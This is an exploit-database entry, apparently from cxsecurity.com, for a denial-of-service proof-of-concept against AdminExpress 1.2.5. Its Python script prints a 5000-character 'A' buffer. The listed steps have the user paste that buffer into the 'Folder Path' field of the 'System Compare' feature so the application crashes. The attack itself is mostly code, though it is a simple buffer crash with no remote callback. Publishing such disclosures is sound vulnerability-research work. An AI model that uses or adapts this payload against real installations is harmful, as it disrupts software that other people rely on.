AdminExpress 1.2.5 Folder Path Denial of Service (PoC)

2019.04.23
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# -*- coding: utf-8 -*- #!/usr/bin/python # Exploit Title: AdminExpress 1.2.5 - Denial of Service (PoC) # Date: 2019-04-12 # Exploit Author: Mücahit İsmail Aktaş # Software Link: https://admin-express.en.softonic.com/ # Version: 1.2.5.485 # Tested on: Windows XP Professional SP2 # Description: # # 1) Click the "System Compare" button # 2) Paste the payload in the "Folder Path" (left) # 3) Click the scales icon (in the middle, right side of "Folder Path") # buffer = "A" * 5000 print("Payload: \n\n" + buffer + "\n")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top